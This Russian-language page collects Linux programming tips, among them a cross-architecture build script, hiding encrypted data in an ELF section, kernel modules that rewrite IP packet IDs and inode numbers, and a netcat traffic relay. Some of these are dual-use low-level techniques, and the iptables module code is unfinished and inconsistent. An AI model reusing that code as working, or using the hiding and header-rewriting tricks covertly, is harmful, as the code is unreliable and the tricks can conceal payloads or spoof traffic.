3. Обязательно обратите внимание на то, что версия нашего хелловорлда - "1.0". Это вписано в предыдущем совете. Если версия у вас уже другая - поменяйте путь в скрипте (найдёте его поиском). Запускать скрипт как: "$ script.sh armv7l" #!/bin/bash [ -z "$1" ] && exit export PATH=$PATH:`pwd`/xbps/usr/bin arch=$1 folder() { case $1 in aarch64-musl) echo aarch64-linux-musl;; aarch64) echo aarch64-linux-gnu;; armv5tel-musl) echo arm-linux-musleabi;; armv5tel) echo arm-linux-gnueabi;; armv5te-musl) echo arm-linux-musleabi;; armv5te) echo arm-linux-gnueabi;; armv6hf-musl) echo arm-linux-musleabihf;; armv6hf) echo arm-linux-gnueabihf;; armv6l-musl) echo arm-linux-musleabihf;; armv6l) echo arm-linux-gnueabihf;; armv7hf-musl) echo armv7l-linux-musleabihf;; armv7hf) echo armv7l-linux-gnueabihf;; armv7l-musl) echo armv7l-linux-musleabihf;; armv7l) echo armv7l-linux-gnueabihf;; i686-musl) echo i686-linux-musl;; i686) echo i686-pc-linux-gnu;; mipselhf-musl) echo mipsel-linux-muslhf;; mipsel-musl) echo mipsel-linux-musl;; mipshf-musl) echo mips-linux-muslhf;; mips-musl) echo mips-linux-musl;; ppc64le-musl) echo powerpc64le-linux-musl;; ppc64le) echo powerpc64le-linux-gnu;; ppc64-musl) echo powerpc64-linux-musl;; ppc64) echo powerpc64-linux-gnu;; ppcle-musl) echo powerpcle-linux-musl;; ppcle) echo powerpcle-linux-gnu;; ppc-musl) echo powerpc-linux-musl;; ppc) echo powerpc-linux-gnu;; x86_64-musl) echo x86_64-linux-musl;; esac } qemu() { case $1 in aarch64-musl) echo qemu-aarch64-static;; aarch64) echo qemu-aarch64-static;; armv5tel-musl) echo qemu-arm-static;; armv5tel) echo qemu-arm-static;; armv5te-musl) echo qemu-arm-static;; armv5te) echo qemu-arm-static;; armv6hf-musl) echo qemu-arm-static;; armv6hf) echo qemu-arm-static;; armv6l-musl) echo qemu-arm-static;; armv6l) echo qemu-arm-static;; armv7hf-musl) echo qemu-arm-static;; armv7hf)aarch64-linux-musl echo qemu-arm-static;; armv7l-musl) echo qemu-arm-static;; armv7l) echo qemu-arm-static;; i686-musl) echo qemu-i386-static;; i686) echo qemu-i386-static;; mipselhf-musl) echo qemu-mipsel-static;; mipsel-musl) echo qemu-mipsel-static;; mipshf-musl) echo qemu-mips-static;; mips-musl) echo qemu-mips-static;; ppc64le-musl) echo qemu-ppc64le-static;; ppc64le) echo qemu-ppc64le-static;; ppc64-musl) echo qemu-ppc64-static;; ppc64) echo qemu-ppc64-static;; ppcle-musl) echo qemu-ppc-static;; ppcle) echo qemu-ppc64le-static;; ppc-musl) echo qemu-ppc-static;; ppc) echo qemu-ppc-static;; x86_64-musl) echo qemu-x86_64-static;; esac } ROOT=`pwd`/testing/$arch # qemu. # на этом шаге мы копируем бинарник qemu в наш будущий рут, чтобы fuse-overlayfs могла его не только найти, но и спокойно запустить [ -s `pwd`/masterdir/usr/$(folder $arch)/$(qemu $arch) ] || cp `which $(qemu $arch)` `pwd`/masterdir/usr/$(folder $arch) echo ----------------------------------------------------------------------------------------------------- echo $arch # обязательно почистим сборку ./xbps-src -a $arch clean helloworld # собираем. детали в прошлом совете ./xbps-src -a $arch -C pkg helloworld || exit $? echo -- package built, lets install them ----------------------------------------------------------------- # создаём временный каталог для fuse-overlayfs [ -d "$ROOT" ] || mkdir "$ROOT" # накладываем собранный (и заинсталлированный тулчейном во внутренний каталог) хелловорлд на новый рут тестируемой платформы # 1.0 - версия сборки вашего пакета. детали в предыдущем совете. sleep 1 fuse-overlayfs \\ -o lowerdir=`pwd`/masterdir/usr/$(folder $arch) \\ -o upperdir=`pwd`/masterdir/destdir/$(folder $arch)/helloworld-1.0 \\ -o workdir=$ROOT \\ $ROOT echo -- testing ------------------------------------------------------------------------------------------ # а вот и само тестирование - тут ваш хелловорлд для проверки может, например, сделать `system("uname -a");` # /usr/bin/helloworld - путь, куда инсталлируется по умолчанию ваша поделка sleep 1 proot -R $ROOT /$(qemu $arch) /usr/bin/helloworld # вот мой вывод, например: "Linux ___ 5.4.0-99-generic #112-Ubuntu SMP Thu Feb 3 13:50:55 UTC 2022 armv7l" echo -- done --------------------------------------------------------------------------------------------- # и, конечно же, надо прибрать за собой. sleep 1 fusermount -u $ROOT Шаг 6: последний - автоматизация. Делаем ещё один, финальный скрипт. Его же и дёргаем когда хотим проверить не сломали ли мы что-то в очередной раз своим новым кoдoм. for arch in x86_64-musl \ aarch64-musl aarch64 \ armv5tel-musl armv5tel armv5te-musl armv5te armv6hf-musl armv6hf armv6l-musl armv6l armv7hf-musl armv7hf armv7l-musl armv7l \ i686-musl i686 \ mipselhf-musl mipsel-musl mipshf-musl mips-musl \ ppc64le-musl ppc64le ppc64-musl ppc64 \ ppcle-musl ppcle \ ppc-musl ppc do ./script.sh $arch done Все. Надеюсь, эта вполне несложная автоматизация поможет вам овладеть действительно мультиплатформенным кодингом.

Sonatype Nexus как Maven proxy (доп. ссылка 1) Автор: ACCA [комментарии]

При попытке установить, например, com.google.protobuf:protoc:exe:linux-x86_64:2.6.1, получаете ошибку: Return code is: 400, ReasonPhrase: Detected content type [application/x-executable], but expected [application/x-dosexec]: com/google/protobuf/protoc/2.6.1/protoc-2.6.1-linux-x86_64.exe В настройке репозитория maven2(proxy) есть незаметная галочка "Validate that all content uploaded to this repository is of a MIME type appropriate for the repository format". Её выключение решает проблему, так как Nexus и Maven Central по-разному назначают MIME type.

Запись бинарных данных в секцию ELF Автор: 赤熊 [комментарии]

Стоит задача - в программе запрятать бинарные данные. Допустим архив. Создаём файл data.cpp для включения запланированных для добавления данных: volatile char a[DATASIZE] __attribute__((section(".her"))) = {0xfa}; Таким образом мы обозначаем намерения создать переменную в отдельной секции. Далее компилируем data.cpp в object-файл data.o: g++ -c -g data.cpp Смотрим shed-адрес секции. И производим заливку согласно предустановленному размеру переменной "a". На　моём компьютере это выглядит так: dd if=out.tar of=data.o bs=1 count= seek=52 conv=notrunc Архив, либо бинарник конечно предварительно может быть зашифрован, дабы избежать лишних посягательств. Дальнейшую сборку программы можно сделать Make файлом, но я решил написать командами для наглядности процесса: g++ -c -g main.cpp g++ -g -o test main.o data.o Альтернативный вариант от посетителя maneken: __asm( ".global data_file\n" ".global _data_file\n" "data_file:\n" "_data_file:\n" ".incbin \"data.zip\"\n" ".global data_file_len\n" ".global _data_file_len\n" "data_file_len:\n" "_data_file_len:\n" ".int .-data_file \n" ); extern void * data_file; extern void * data_file_len; unsigned char * data =(unsigned char *)&data_file; int * datalen =(int *) &data_file_len;

Оценка стоимости сборки Android 5 (x86-64) на облачных серверах Amazon EC2 (доп. ссылка 1) Автор: Abylay Ospan [комментарии]

Краткая сводка по результатам тестирования: сервер 4 CPU, 16GB RAM, время сборки: 04:35:30 стоимость: $1.15 сервер 16 CPU, 64GB RAM, время сборки: 01:12:02 стоимость: $1.21 сервер 40 CPU, 160GB RAM, время сборки: 00:32:15 стоимость: $1.34 По результам видно, что разница в цене всего 15%, но при этом время сборки уменьшается в 8-9 раз. Сборка проводилась в разное количество потоков (make -j X). Лучший результат показал вариант 'количество CPU * 2'. Исходные тексты Android были взяты из репозитория на http://www.android-x86.org/ Сборка проводилась командами: . build/envsetup.sh && lunch android_x86_64-eng && make -j X ОС: Ubuntu 14.04.2 LTS, kernel 3.13.0-48-generic x86_64 CPU: Intel(R) Xeon(R) CPU E5-2676 v3 @ 2.40GHz HDD: SSD 160GB

Как собрать в новом GCC старую C++-программу, использующую iostream.h [комментарии]

В блоках #include следует заменить iostream.h и fstream.h на iostream и fstream (убрать ".h"). В начало файлов нужно добавить "using namespace std;", а при сборке в Makefile указать флаг "-fpermissive".

Внедрение точек останова gdb в исходный код (доп. ссылка 1) Автор: glebiao [комментарии]

На github опубликован способ внедрения в исходный код точек останова для gdb, не влияющий на нормальное выполнение программы в отсутствие отладчика. Способ основан на размещении адреса локальной переменной в секции (embed-breakpoints линкера). #define EMBED_BREAKPOINT \\ asm("0:" \\ ".pushsection embed-breakpoints;" \\ ".quad 0b;" \\ ".popsection;") int main() { printf("Hello,\\n"); EMBED_BREAKPOINT; printf("world!\\n"); EMBED_BREAKPOINT; return 0; } Собираем враппер для gdb: sudo apt-get install binutils-dev git clone git://github.com/kmcallister/embedded-breakpoints.git cd embedded-breakpoints ./build.sh Собираем тестовое приложение и запускаем под управлением враппера к gdb: $ gcc -g -o example example.c $ ./gdb-with-breakpoints ./example Reading symbols from example...done. Breakpoint 1 at 0x4004f2: file example.c, line 8. Breakpoint 2 at 0x4004fc: file example.c, line 10. (gdb) run Starting program: example Hello, Breakpoint 1, main () at example.c:8 8 printf("world!\\n"); (gdb) info breakpoints Num Type Disp Enb Address What 1 breakpoint keep y 0x00000000004004f2 in main at example.c:8 breakpoint already hit 1 time 2 breakpoint keep y 0x00000000004004fc in main at example.c:10 При выполнении напрямую и или в версии gdb без специального враппера точки останова никак не отражаются на работе программы.

Создание модуля для iptables, изменяющего ID пакета (доп. ссылка 1) Автор: xlise [комментарии]

Данная статья основывается на материале "Разработка Match-модуля для iptables своими руками" (http://www.linuxjournal.com/article/7184), но код работает на ядрах 2.6.20+. Мне потребовалось изменить ID IP пакетов, в интернете подходящей инструкции как это сделать на ядре 2.6.24 я не нашел, из-за этого решил написать, как удалось решить задачу. Для реализации задуманного нам понадобится написать модуль ядра, который будет выполнять проверку и модуль расширения для iptables, который будет работать с модулем ядра - создавать новые цепочки, использующие наш модуль, выводить информацию о критерии при выводе списка правил на экран, а также проверять корректность передаваемых модулю параметров. Сначала создадим общий заголовочный файл ipt_ID.h: #ifndef _IPT_ID_H #define _IPT_ID_H enum { IPT_ID_RAND = 0, IPT_ID_INC }; #define IPT_ID_MAXMODE IPT_ID_INC struct ipt_ID_info { u_int8_t mode; u_int16_t id; }; #endif Теперь скопируем его в исходники netfilter в директорию linux/netfilter_ipv4/ Далее рассмотрим модуль ядра ipt_ID.с. #include <linux/module.h> #include <linux/skbuff.h> #include <linux/ip.h> #include <net/checksum.h> #include <linux/random.h> #include <linux/netfilter/x_tables.h> #include <linux/netfilter_ipv4/ipt_ID.h> MODULE_AUTHOR("Xlise <demonxlise@gmail.com>"); MODULE_DESCRIPTION("Xtables: IPv4 ID field modification target"); MODULE_LICENSE("GPL"); static int count=0; static struct iphdr l_iph[5]; static unsigned int id_tg(struct sk_buff *skb, const struct net_device *in, const struct net_device *out, unsigned int hooknum, const struct xt_target *target, const void *targinfo) { struct iphdr *iph; const struct ipt_ID_info *info = targinfo; u_int16_t new_id; int i=0; if (!skb_make_writable(skb, skb->len)) return NF_DROP; iph = ip_hdr(skb); switch (info->mode) { case IPT_ID_RAND: get_random_bytes(&info->id, sizeof(info->id)); new_id = info->id; break; case IPT_ID_INC: while (i<5) { if (l_iph[i].daddr == iph->daddr) { new_id = l_iph[i].id + htons(1); l_iph[i].id = new_id; } else {new_id = iph->id; l_iph[count] = *iph; count++; if (count > 4) count = 0; } i++; } default: new_id = iph->id; break; } if (new_id != iph->id) { csum_replace2(&iph->check, iph->id, new_id); iph->id = new_id; } return XT_CONTINUE; } static bool id_tg_check(const char *tablename, const void *e, const struct xt_target *target, void *targinfo, unsigned int hook_mask) { const struct ipt_ID_info *info = targinfo; if (info->mode > IPT_ID_MAXMODE) { printk(KERN_WARNING "ipt_ID: invalid or unknown Mode %u\n", info->mode); return false; } if (info->mode != IPT_ID_SET && info->id == 0) return false; return true; } static struct xt_target id_tg_reg __read_mostly = { .name = "ID", .family = AF_INET, .target = id_tg, .targetsize = sizeof(struct ipt_ID_info), .table = "mangle", .checkentry = id_tg_check, .me = THIS_MODULE, }; static int __init id_tg_init(void) { return xt_register_target(&id_tg_reg); } static void __exit id_tg_exit(void) { xt_unregister_target(&id_tg_reg); } module_init(id_tg_init); module_exit(id_tg_exit); Напишем Makefile для нашего модуля: obj-m := ipt_ID.o KDIR := /lib/modules/$(shell uname -r)/build PWD := $(shell pwd) $(MAKE) -C $(KDIR) M=$(PWD) modules добавим модуль в ядро insmod ipt_ID.ko Для создания модуля для iptables нам потребуются исходники для iptables-1.4.4 Создадим файл libipt_ID.c #include <stdio.h> #include <string.h> #include <stdlib.h> #include <getopt.h> #include <xtables.h> #include <linux/netfilter_ipv4/ipt_ID.h> #define IPT_ID_USED 1 static void ID_help(void) { printf( "ID target options\n" " --id-rand value Set ID to \n" " --id-inc value Increment ID by \n"); } static int ID_parse(int c, char **argv, int invert, unsigned int *flags, const void *entry, struct xt_entry_target **target) { struct ipt_ID_info *info = (struct ipt_ID_info *) (*target)->data; u_int16_t value; if (*flags & IPT_ID_USED) { xtables_error(PARAMETER_PROBLEM, "Can't specify ID option twice"); } if (!optarg) xtables_error(PARAMETER_PROBLEM, "ID: You must specify a value"); if (xtables_check_inverse(optarg, &invert, NULL, 0)) xtables_error(PARAMETER_PROBLEM, "ID: unexpected `!'"); if (!xtables_strtoui(optarg, NULL, &value, 0, UINT16_MAX)) xtables_error(PARAMETER_PROBLEM, "ID: Expected value between 0 and 255"); switch (c) { case '1': info->mode = IPT_ID_RAND; break; case '2': if (value == 0) { xtables_error(PARAMETER_PROBLEM, "ID: increasing by 0?"); } info->mode = IPT_ID_INC; break; default: return 0; } info->id = value; *flags |= IPT_ID_USED; return 1; } static void ID_check(unsigned int flags) { if (!(flags & IPT_ID_USED)) xtables_error(PARAMETER_PROBLEM, "TTL: You must specify an action"); } static void ID_save(const void *ip, const struct xt_entry_target *target) { const struct ipt_ID_info *info = (struct ipt_ID_info *) target->data; switch (info->mode) { case IPT_ID_SET: printf("--id-set "); break; case IPT_ID_DEC: printf("--id-dec "); break; case IPT_ID_INC: printf("--id-inc "); break; } printf("%u ", info->id); } static void ID_print(const void *ip, const struct xt_entry_target *target, int numeric) { const struct ipt_ID_info *info = (struct ipt_ID_info *) target->data; printf("ID "); switch (info->mode) { case IPT_ID_SET: printf("set to "); break; case IPT_ID_DEC: printf("decrement by "); break; case IPT_ID_INC: printf("increment by "); break; } printf("%u ", info->id); } static const struct option ID_opts[] = { { "id-set", 1, NULL, '1' }, { "id-inc", 1, NULL, '2' }, { .name = NULL } }; static struct xtables_target id_tg_reg = { .name = "ID", .version = XTABLES_VERSION, .family = NFPROTO_IPV4, .size = XT_ALIGN(sizeof(struct ipt_ID_info)), .userspacesize = XT_ALIGN(sizeof(struct ipt_ID_info)), .help = ID_help, .parse = ID_parse, .final_check = ID_check, .print = ID_print, .save = ID_save, .extra_opts = ID_opts, }; void _init(void) { xtables_register_target(&id_tg_reg); } Далее скопируем файл ipt_ID.h в iptables-1.4.4/include/linux/netfilter_ipv4/ и файл libipt_ID.c в iptables-1.4.4/extensions/ теперь скомпилируем iptables и скопируем файл iptables-1.4.4/extensions/libipt_ID.so в /lib/xtables/ Теперь можно создавать цепочки в iptables пример: iptables -t mangle -A POSTROUTING -j ID --id-rand 1 Будет выдавть всем пакетам случайные ID (единица в конце ничего не обозначает просто я не доделал модуль) iptables -t mangle -A POSTROUTING -j ID --id-inc 1 Будет пакетам направленным на один IP присваивать ID постоянно увеличивая на единицу, может хранить в памяти пять таких цепочек (количество цепочек можно увеличить) P.S. Если кого интересует данная тема, то я доделаю статью и допишу модуль, просто пока всё работает и так не хочется ничего переделывать, но если нужно сделаю.

Как в программе на Си узнать от какого пользователя запущен активный экран Автор: pavlinux [комментарии]

#include <stdio.h> #include <stdlib.h> #include <string.h> // strcmp #include <utmpx.h> #define XTTY ":0" int main(void) { struct utmpx *entry; setutxent(); while ( (entry = getutxent()) != NULL) { if ( !strcmp(entry->ut_line, XTTY) ) printf("%s %s\n",entry->ut_line, entry->ut_user); } endutxent(); return(EXIT_SUCCESS); }

Как указать GCC выводить предупреждения для бессмысленных сравнений (доп. ссылка 1) Автор: Kir Kolyshkin [комментарии]

При сборке ниже представленного некорректного кода, gcc не выдает никаких предупреждений даже с -Wall, при этом указатель он приводит к unsigned, поэтому результат сравнения всегда ложен. if ((fp = fopen(file, "w")) < 0) Если написать: unsigned int a; if (a < 0) return 1; return 0; gcc опять не ругается и даже с -O0 генерирует код, который не делает никаких сравнений, а сразу возвращает результат. То есть знает, что сравнение бессмысленное, но молчит. Для того, чтобы gcc начал выводить предупреждения нужно указать -Wextra, тогда буде выведено: warning: comparison of unsigned expression < 0 is always false Вариант 2 (правильный): $ gcc -std=c99 -W

Изменение номера inode файла в Linux Автор: Victor Leschuk [комментарии]

Для некоторых специфических целей может понадобиться изменить номер inode у существующего файла, либо создать файл с заранее заданным номером. Штатными средствами сделать это - задача нетривиальная, однако с помощью модуля ядра это несложно. Создаем файл inode_modify.c следующего содержания: #include <linux/module.h> #include <linux/kernel.h> #include <linux/version.h> #include <linux/fs.h> #include <linux/namei.h> #ifndef BUF_LEN #define BUF_LEN 256 #endif char file[BUF_LEN]; unsigned long new_num=0; module_param_string( name, file, BUF_LEN, 0); module_param(new_num, ulong, 0); struct nameidata nd; unsigned long get_number() { int error; error = path_lookup( file, 0, &nd); printk( KERN_ALERT "name = %s\n", file); if(error) { printk( KERN_ALERT "Can't access file\n"); return -1; } #if LINUX_VERSION_CODE >= KERNEL_VERSION(2,6,25) return nd.path.dentry->d_inode->i_ino; #else return nd.dentry->d_inode->i_ino; #endif } unsigned long set_number(unsigned long new_num) { #if LINUX_VERSION_CODE >= KERNEL_VERSION(2,6,25) nd.path.dentry->d_inode->i_ino = new_num; return nd.path.dentry->d_inode->i_ino; #else nd.dentry->d_inode->i_ino = new_num; return nd.dentry->d_inode->i_ino; #endif } int inode_modify_init(){ unsigned long inode_num; inode_num = get_number(); printk ( KERN_ALERT "Inode number is %lu\n", inode_num); printk ( KERN_ALERT "New inode number is %lu\n", set_number(new_num)); return 0; } void inode_modify_exit(){ printk(KERN_ALERT "Exiting...\n"); } module_init(inode_modify_init); module_exit(inode_modify_exit); MODULE_LICENSE("GPL"); MODULE_AUTHOR("Victor Leschuk <Victor.Leschuk@ebanat.com>"); И простой Makefile: obj-m := inode_modify.o После чего в директории с модулем: $ make -C /path/to/kernel/sources SUBDIRS=$PWD modules Здесь нужно помнить, что исходники и версия gcc должны соответствовать тем, которые были использованы при сборке используемого ядра. Далее тестируем модуль: $ touch /dev/shm/test $ ls -i /dev/shm/test 172461 /dev/shm/test $ sudo insmod ./inode_modify.ko name=/dev/shm/test new_num=12345 $ ls -i /dev/shm/test 12345 /dev/shm/test $ sudo rmmod inode_modify $ dmesg |tail name = /dev/shm/test Inode number is 172461 New inode number is 12345 Exiting...

Как отлаживать сетевые скрипты с помощью netcat (доп. ссылка 1) Автор: Вячеслав [комментарии]

mkdir tmp cd tmp mkfifo sock1 sock2 nc -l -p 8000 < sock1 | tee sock2 & nc 10.245.134.32 23 < sock2 | tee sock1 Теперь вместо того, чтобы устанавливать соединение непосредственно с узлом 10.245.134.32:23, делаем telnet на localhost:8000 из другой консоли на хосте home и наблюдаем проходящие данные внутри tcp-сессии в консоли, где выполняли команды. Для этой же цели подходит и утилита socat: socat -v tcp4-l:8000 tcp4:yandex.ru:80

Отладка php скриптов на стороне сервера Автор: Pavel Piatruk [комментарии]

Иногда пользовательские скрипты или зависают, или хотят соединиться с чем-то запрещенным в файрволе, или интерпретатор неожиданно вылетает, не передав заголовок Content-type, что приводит к ошибке 500. Для того, чтобы разобраться в причине, попробуем отладить скрипты со стороны сервера, не залезая в код php. Сначала придется изменить конфигурацию apache, чтобы php работало через suphp, а не через модуль mod_php5. Я не буду рассказывать, как это делается. Главное, кроме обычного, "неотладочного", надо добавить свой обработчик в suphp.conf: x-httpd-php_debug=php:/usr/local/bin/php-cgi.sh А вот содержимое этого скрипта /usr/local/bin/php-cgi.sh. Поставьте ему права 755. Видно, что он запускает отладчиком php с перенаправлением отладочной информации в файл. #!/bin/bash /usr/bin/strace /usr/bin/php5-cgi $@ 2>/tmp/debug Не забудьте добавить этот обработчик в конфиг apache , это делается строкой suPHP_AddHandler x-httpd-php_debug Затем в .htaccess нужного сайта допишите AddHandler x-httpd-php_debug .php В результате после повторной загрузки сайта появится файл /tmp/debug, в который будет добавляться отладочная информация о работе php нужного сайта. В это время лучше ограничить посещение сайта, разрешив только 1 IP адрес, чтобы отладочной информации не было чрезмерно. Обычно будет достаточно имени системного вызова, который приводит к прекращению выполнения скрипта. Можно поиграться с параметрами strace.

Ускорение компиляции в Gentoo (доп. ссылка 1) Автор: wildarcher7 [комментарии]

В наличии два ПК, на которых установлен Gentoo Linux с одинаковой версией gcc (4.3.1). Так как компиляция из исходников в Gentoo необходима и компиляция отнимает некоторое время, хотелось бы сократить время сборки. На помощь приходит distcc и ccache. Всё описанное ниже нужно проделать на обоих ПК. emerge distcc ccache #установим distcc и ccache Две данные строчки появились в данной статье при помощи метода профессора Копи-Пастера: mv /root/.ccache /root/snafu.ccache ln -s /var/tmp/ccache /root/.ccache distcc-config --set-hosts "192.168.0.1 192.168.0.2" #перечислим ip адреса серверов distcc rc-update add distccd # /etc/init.d/distccd restart ccache -M 4G /etc/conf.d/distccd DISTCCD_OPTS="${DISTCCD_OPTS} -allow 192.168.0.0/24" #разрешим доступ для подсети настроим make.conf FEATURES="ccache distcc" CCACHE_DIR="/var/tmp/ccache" CCACHE_SIZE="4G" DISTCC_HOSTS="192.168.0.1 192.168.0.2" DISTCC_DIR="/tmp/.distcc" #DISTCC_VERBOSE="1" #раз комментировать при желании лицезреть подробный отчет о проделанной работе distcc Источник http://wildarcher7.wordpress.com/

VMWare Workstation 6 для отладки ядра Linux (доп. ссылка 1) Автор: Тарасенко Николай [комментарии]

Недавно была добавлена интересная особенность в Workstation 6.0, которая делает WS6 отличным средством для отладки ядра Linux. Теперь можно с легкостью отлаживать Linux VM на хосте при помощи gdb без каких-либо изменений в Guest VM. Ни каких kdb, перекомпиляций или еще одной машины не требуется. Все что вам потребуется, так это всего одна строчка в VM'шном конфигурационном файле. Чтобы использовать новую особенность, необходимо достать последний билд WS6: http://www.vmware.com/products/beta/ws/ Разместить в вашем Linux VM конфигурационном файле строчку: debugStub.listen.guest32=1 Теперь, всякий раз, когда вы запускаете виртуальную машину, Вы будете видеть на хост консоле: VMware Workstation is listening for debug connection on port 8832. Запустите gdb на хосте, ссылаясь на ядро, для которого у Вас есть System.map и присоедините его к виртуальной машине: % gdb (gdb) file vmlinux-2.4.21-27.EL.debug (gdb) target remote localhost:8832

Как посмотреть причину генерации core файла в gdb (доп. ссылка 1) [комментарии]

программа - файл рухнувшей программы, собранной с включением отладочной информации core - файл с core $ gdb Указываем файл рухнувшей программы, собранной с включением отладочной информации (gdb) программа Указываем файл с core, будет показана причина и строка на которой приложение рухнуло (gdb) core core (gdb) info thread (gdb) info shared (gdb) info locals (gdb) info files (gdb) info variables (gdb) help info Смотрим состояние стека до падения (gdb) backtrace 1 (gdb) backtrace 2 или просто (gdb) backtrace Указываем номер фрейма который будем смотреть подробнее (показан как #N) (gdb) frame 0 Смотрим состояние переменных (в примере - result) (gdb) info locals (gdb) print result (gdb) whatis result Полезно также посмотреть на выполнении какого системного вызова происходит сбой используя программы strace (http://strace.sourceforge.net), ltrace (для Linux) или ktrace и truss (входят в состав FreeBSD).

Как избавиться от линковки GNOME приложения с лишними библиотеками (доп. ссылка 1) [комментарии]

Собираем по умолчанию: readelf -d /usr/local/bin/gnome-terminal |grep NEEDED | wc -l 52 - требуется 52 библиотеки. Устанавливаем флаг --as-needed: export CFLAGS = "-Os -s -Wl,--as-needed" После пересборки, требуется 21 реально необходимая для работы библиотека.

Обобщение используемых моделей ввода/вывода (доп. ссылка 1) [обсудить]

Стратегии организации ввода-вывода:

Блокируемый I/O - после вызова read/write происходит блокировка до завершения операции, функция завершается только после принятия или передачи блока данных.
Неблокируемый I/0 - функция завершается сразу, если данные не были приняты/отправлены возвращается код ошибки (т.е. нужно вызывать функции I/O в цикле пока не получим положительный результат).
Мультиплексирование через select/poll - опрашиваем список состояния сокетов, перебирая состояния определяем сокеты готовые для приема/передачи. Главный минус - затраты на перебор, особенно при большом числе неактивных сокетов.

select - число контролируемых сокетов ограничено лимитом FD_SETSIZE, в некоторых случаях лимит обходится пересборкой программы, в других - пересборкой ядра ОС.
poll - нет лимита FD_SETSIZE, но менее эффективен из за большего размера передаваемой в ядро структуры.

Генерация сигнала SIGIO при изменении состояния сокета (ошибка, есть данные для приема, или отправка завершена), который обрабатывает обработчик SIGIO. В классическом виде применение ограничено и трудоемко, подходит больше для UDP.
Асинхронный I/O - описан в POSIX 1003.1b (aio_open, aio_write, aio_read...), функция aio_* завершается мгновенно, далее процесс сигнализируется о полном завершении операции ввода/вывода (в предыдущих пунктах процесс информировался о готовности прочитать или передать данные, т.е. данные еще нужно было принять или отправить через read/write, в aio_* процесс сигнализируется когда данные полностью получены и скопированы в локальный буфер).
Передача данных об изменении состояния сокета через генерацию событий. (специфичные для определенных ОС решения, малопереносимы, но эффективны).

kqueue - лучшее для FreeBSD, NetBSD. Данные о нескольких событиях могут быть переданы за раз, очень гибкое решение.
/dev/epoll - лучшее для 2.6 Linux ядра, передача нескольких событий за раз, трудоемкость поддержки /dev/epoll если параллельно в программе поддерживаются другие механизмы нотификации.
Realtime Signals (F_SETSIG) - лучшее для 2.4 Linux ядра.
/dev/poll - имеет смысл в Solaris, в Linux реализация недостаточно хороша.
Ссылки:

libevent - очень хорошая библиотека враппер для работы с kqueue, select, poll, epoll и real-time signals.
kqueue - a generic and scalable event notification facility
man kqueue
Слайды "The kqueue facility in FreeBSD"
/dev/epoll - a highspeed Linux kernel patch
Improving (network) I/O performance - описание /dev/epoll с примерами кода, неплохое сравнение с poll(), realtime signals и /dev/poll.
signal-per-fd" Linux kernel patch
Analysis of RealTime Signals for Highly Concurrent Network I/O
Using the devpoll (/dev/poll) Interface Using the select() and poll() methods
Главная ссылка к новости

The C10K problem - отличное собрание информации по стратегиям ввода/вывода

ru.unix.prog FAQ - Некоторые методы получения состояния (активности) сокета

High-Performance Server Architecture

Сравнение производительности poll, kqueue и /dev/poll

Сравнение производительности poll() и realtime signals

Краткое введение в kqueue/kevent (rus);

Как посмотреть какие файлы пытается открыть или выполнить программа [комментарии]

strace -f -o strace.txt -e execve программа strace -f -o strace.txt -e open,ioctl программа

Как посмотреть какие функции системных библиотек используются в программе [комментарии]

nm "объектный или запускной файл" Для работы nm нужна таблица символов, т.е. нельзя использовать после утилиты strip или ключа "-s" в gcc.

Как пропатчить приложение запускаемое через inetd для определения IP клиента. Автор: uldus [обсудить]

Си: struct sockaddr_in addr_name; socklen_t addr_len; addr_len = sizeof(addr_name); bzero(&addr_name, sizeof(addr_name)); if (getpeername(0, (struct sockaddr *)&addr_name, &addr_len) >= 0){ // выводим адрес в printf через inet_ntoa(addr_name.sin_addr) } Perl: use Socket; my $std_sockaddr = getpeername(STDIN); my $cur_ipaddr = "0.0.0.0"; if (defined $std_sockaddr){ my ($tmp_port, $tmp_iaddr) = sockaddr_in($std_sockaddr); $cur_ipaddr = inet_ntoa($tmp_iaddr); }

Какие параметры указать GCC для оптимизации. (доп. ссылка 1) [комментарии]

-O6 - полная оптимизация (по умолчанию часто стоит -O2). -fomit-frame-pointer -использовать стек для доступа к переменным. -march=i686 -mcpu=i686 -DARCH=k6 -DCPU=k6 - оптимизация под CPU (586, 686,k5,k6,k7,athlon,pentiumpro). -ffast-math -funroll-loops

Как узнать какие динамические библиотеки прилинкованы к программе [комментарии]

ldd файл

Сборка хелловорлда под 17 платформ одним скриптом Автор: Урри [комментарии]

Понадобилось настроить и запустить на сторонней машине автоматизированную сборку (и автотесты) своего кода сразу под ARM, MIPS, x86 и PowerPC - решил заодно поделиться с местным сообществом. Сейчас будет про автоматическую сборку. Про тестирование будет отдельно. Хотите собрать свой хелловорлд сразу под 17 (29 вариантов сборки, так как почти каждая платформа идёт в двух вариантах: libc и musl)? Если да - внизу шаги. Сборка осуществляется с помощью сборочного инструментарий void-linux, за что им огромное спасибо - работа проделана огромная. Рецепт описывается простой и последовательный. Желающие сделать что-то нестандартное или разнообразить секс^Wпроцесс сборки идут читать инструкцию на гитхаб, она не слишком большая и вполне понятная. Вот, что нам надо:
Linux, любой (я использую Mint),
Git (им будем ставить тулчейны для сборки исходных текстов),
20+ ГБ на диске (у меня выделенный SSD, хотя все равно долго получается). Все остальное автоматически доставится в процессе. Шаг 1: xbps Собираем xbps: $ git clone --depth 1 https://github.com/void-linux/xbps $ cd xbps $ ./configure --enable-rpath --prefix=/usr --sysconfdir=/etc $ make Ставим его в отдельный каталог, не замусоривая систему (пусть это будет каталог ~/xbps-git) $ make DESTDIR=~/xbps-git install clean Прекрасно, базовый инструментарий готов. Добавляем путь к xbps в PATH (потом это же сделаем в скрипте) $ export PATH=~/xbps-git/usr/bin:$PATH Шаг 2: сборочный инструментарий void-linux. Забираем инструментарий: $ git clone --depth 1 https://github.com/void-linux/void-packages $ cd void-packages Не забываем про PATH к xbps, который прописали раньше (export PATH=~/xbps-git/usr/bin:$PATH) Доставляем локально недостающие детали: $ ./xbps-src binary-bootstrap Шаг 3: готовим свой код к сборке Ваш код, само собой, лежит где-то на гитхабе (гитлабе, дома) и у него проставлен тег "1.0". В каталоге srcpkgs создаем свой подкаталог с любым именем (у нас будет helloworld) В созданном каталоге размещаем вот такой текстовый файл "template": # Template file for 'helloworld' pkgname=helloworld version=1.0 revision=1 build_style=gnu-makefile hostmakedepends="xxd" short_desc="Hello World" maintainer="superpuperprogrammer <superpuperprogrammer@gmail.com>" license="MIT" homepage="https://superpuperprogrammer.github.io/" distfiles="https://github.com/superpuperprogrammer/helloworld/archive/${version}.tar.gz" checksum=b5...............f1 do_check() { make check } post_install() { vlicense LICENSE } "xxd" в зависимостях просто так - впишите своё, если надо; адрес архива с кодом вписываете свой, в примере гитхаб по тегу; checksum получаете запустив "sha256sum 